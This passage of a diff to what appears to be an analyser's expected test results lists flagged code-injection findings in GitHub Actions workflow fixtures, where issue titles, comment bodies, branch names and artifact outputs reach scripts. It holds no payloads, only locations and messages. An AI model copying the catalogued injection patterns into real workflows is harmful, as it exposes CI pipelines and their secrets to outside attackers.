github.event.workflow_run.head_commit.message | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:10:19:10:70 | github.event.workflow_run.head_commit.message | ${{ github.event.workflow_run.head_commit.message }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:11:19:11:75 | github.event.workflow_run.head_commit.author.email | ${{ github.event.workflow_run.head_commit.author.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:12:19:12:74 | github.event.workflow_run.head_commit.author.name | ${{ github.event.workflow_run.head_commit.author.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:13:19:13:78 | github.event.workflow_run.head_commit.committer.email | ${{ github.event.workflow_run.head_commit.committer.email }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:14:19:14:77 | github.event.workflow_run.head_commit.committer.name | ${{ github.event.workflow_run.head_commit.committer.name }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:15:19:15:62 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run.yml:16:19:16:78 | github.event.workflow_run.head_repository.description | ${{ github.event.workflow_run.head_repository.description }} | .github/workflows/workflow_run.yml:2:3:2:14 | workflow_run | .github/workflows/workflow_run.yml | -| .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches3.yml:12:20:12:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches3.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches3.yml | -| .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/workflow_run_branches5.yml:13:20:13:63 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/workflow_run_branches5.yml:4:3:4:14 | workflow_run | .github/workflows/workflow_run_branches5.yml | +| .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action1/action.yml:7:19:7:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/composite-action-caller-1.yml:3:3:3:21 | pull_request_target | pull_request_target | +| .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:19:19:19:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/actions/action5/action.yml:34:19:34:37 | inputs.taint | ${{ inputs.taint }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/actions/clone-repo/action.yaml:22:19:22:37 | inputs.title | ${{ inputs.title }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | .github/workflows/reusable-workflow-caller-3.yml:10:15:10:52 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:36:21:36:39 | inputs.taint | ${{ inputs.taint }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:44:19:44:56 | github.event.pull_request.title | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:53:26:53:39 | env.log | ${{ env.log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:45:24:45:61 | github.event.changes.title.from | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | Potential code injection in $@, which may be controlled by an external user ($@). | .github/reusable_workflows/TestOrg/TestRepo/.github/workflows/reusable-workflow.yml:66:34:66:52 | env.prev_log | ${{ env.prev_log }} | .github/workflows/reusable-workflow-caller-3.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | .github/workflows/argus_case_study.yml:17:25:17:53 | github.event.issue.title | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/argus_case_study.yml:27:33:27:77 | steps.remove_quotations.outputs.replaced | ${{steps.remove_quotations.outputs.replaced}} | .github/workflows/argus_case_study.yml:4:3:4:8 | issues | issues | +| .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | .github/workflows/artifactpoisoning1.yml:14:9:20:6 | Uses Step | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning1.yml:27:67:27:92 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning1.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | .github/workflows/artifactpoisoning2.yml:13:9:19:6 | Uses Step: pr | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning2.yml:22:17:22:42 | steps.pr.outputs.id | ${{ steps.pr.outputs.id }} | .github/workflows/artifactpoisoning2.yml:4:3:4:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | .github/workflows/artifactpoisoning3.yml:20:9:41:6 | Uses Step | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning3.yml:53:20:53:50 | steps.prepare.outputs.pr | ${{ steps.prepare.outputs.pr }} | .github/workflows/artifactpoisoning3.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning4.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning4.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning4.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | .github/workflows/artifactpoisoning5.yml:8:9:16:6 | Uses Step | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning5.yml:22:20:22:56 | steps.artifact.outputs.content | ${{ steps.artifact.outputs.content }} | .github/workflows/artifactpoisoning5.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:21:20:21:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | .github/workflows/artifactpoisoning6.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning6.yml:29:20:29:59 | steps.artifact2.outputs.pr_number | ${{ steps.artifact2.outputs.pr_number }} | .github/workflows/artifactpoisoning6.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | .github/workflows/artifactpoisoning7.yml:8:9:15:6 | Uses Step | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning7.yml:30:20:30:58 | steps.artifact.outputs.pr_number | ${{ steps.artifact.outputs.pr_number }} | .github/workflows/artifactpoisoning7.yml:3:5:3:16 | workflow_run | workflow_run | +| .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | .github/workflows/artifactpoisoning8.yml:9:9:17:6 | Uses Step | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/artifactpoisoning8.yml:22:20:22:51 | steps.artifact.outputs.id | ${{ steps.artifact.outputs.id }} | .github/workflows/artifactpoisoning8.yml:4:5:4:16 | workflow_run | workflow_run | +| .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:9:15:9:46 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:15:19:15:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:16:19:16:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:17:19:17:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:24:31:24:62 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:27:31:27:60 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue.yml:30:31:30:61 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/comment_issue.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:10:25:10:56 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:11:24:11:51 | github.event.issue.body | ${{github.event.issue.body}} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/comment_issue_newline.yml:12:24:12:55 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/comment_issue_newline.yml:1:5:1:17 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | .github/workflows/composite-action-caller-3.yml:12:19:12:50 | github.event.comment.body | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:13:21:13:51 | steps.foo.outputs.result | ${{ steps.foo.outputs.result }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | .github/actions/action5/action.yml:28:16:28:45 | github.event.issue.body | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-3.yml:14:21:14:52 | steps.foo.outputs.result2 | ${{ steps.foo.outputs.result2 }} | .github/workflows/composite-action-caller-3.yml:3:3:3:15 | issue_comment | issue_comment | +| .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | .github/workflows/composite-action-caller-4.yml:14:19:14:56 | github.event.pull_request.title | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/composite-action-caller-4.yml:17:21:17:53 | steps.clone.outputs.result | ${{ steps.clone.outputs.result }} | .github/workflows/composite-action-caller-4.yml:4:3:4:21 | pull_request_target | pull_request_target | +| .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | +| .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion.yml:1:5:1:14 | discussion | discussion | +| .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:7:19:7:54 | github.event.discussion.title | ${{ github.event.discussion.title }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:8:19:8:53 | github.event.discussion.body | ${{ github.event.discussion.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/discussion_comment.yml:9:19:9:50 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/discussion_comment.yml:1:5:1:22 | discussion_comment | discussion_comment | +| .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | .github/workflows/image_link_generator.yml:18:18:18:49 | github.event.comment.body | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/image_link_generator.yml:37:85:37:125 | steps.trim-url.outputs.trimmed_url | ${{ steps.trim-url.outputs.trimmed_url }} | .github/workflows/image_link_generator.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:13:19:13:49 | github.event.issue.title | ${{ github.event.issue.title }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:14:19:14:48 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:15:19:15:39 | env.global_env | .github/workflows/issues.yaml:4:16:4:46 | github.event.issue.title | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:15:19:15:39 | env.global_env | ${{ env.global_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:17:19:17:36 | env.job_env | .github/workflows/issues.yaml:10:17:10:47 | github.event.issue.title | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:17:19:17:36 | env.job_env | ${{ env.job_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/issues.yaml:18:19:18:37 | env.step_env | .github/workflows/issues.yaml:20:20:20:50 | github.event.issue.title | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/issues.yaml:18:19:18:37 | env.step_env | ${{ env.step_env }} | .github/workflows/issues.yaml:1:5:1:10 | issues | issues | +| .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:13:20:13:51 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/json_wrap.yml:23:31:23:68 | toJSON(github.event.issue.title) | ${{ toJSON(github.event.issue.title)}} | .github/workflows/json_wrap.yml:4:3:4:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:3:3:3:8 | issues | issues | +| .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:44:20:44:49 | github.event.issue.body | ${{ github.event.issue.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level0.yml:69:35:69:66 | github.event.comment.body | ${{ github.event.comment.body }} | .github/workflows/level0.yml:5:3:5:15 | issue_comment | issue_comment | +| .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/level1.yml:37:38:37:81 | github.event.workflow_run.head_branch | ${{ github.event.workflow_run.head_branch }} | .github/workflows/level1.yml:3:3:3:14 | workflow_run | workflow_run | +| .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:7:19:7:56 | github.event.pull_request.title | ${{ github.event.pull_request.title }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:8:19:8:55 | github.event.pull_request.body | ${{ github.event.pull_request.body }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:9:19:9:61 | github.event.pull_request.head.label | ${{ github.event.pull_request.head.label }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:10:19:10:75 | github.event.pull_request.head.repo.default_branch | ${{ github.event.pull_request.head.repo.default_branch }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:11:19:11:72 | github.event.pull_request.head.repo.description | ${{ github.event.pull_request.head.repo.description }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:12:19:12:69 | github.event.pull_request.head.repo.homepage | ${{ github.event.pull_request.head.repo.homepage }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | pull_request_review | +| .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | Potential code injection in $@, which may be controlled by an external user ($@). | .github/workflows/pull_request_review.yml:13:19:13:59 | github.event.pull_request.head.ref | ${{ github.event.pull_request.head.ref }} | .github/workflows/pull_request_review.yml:1:5:1:23 | pull_request_review | 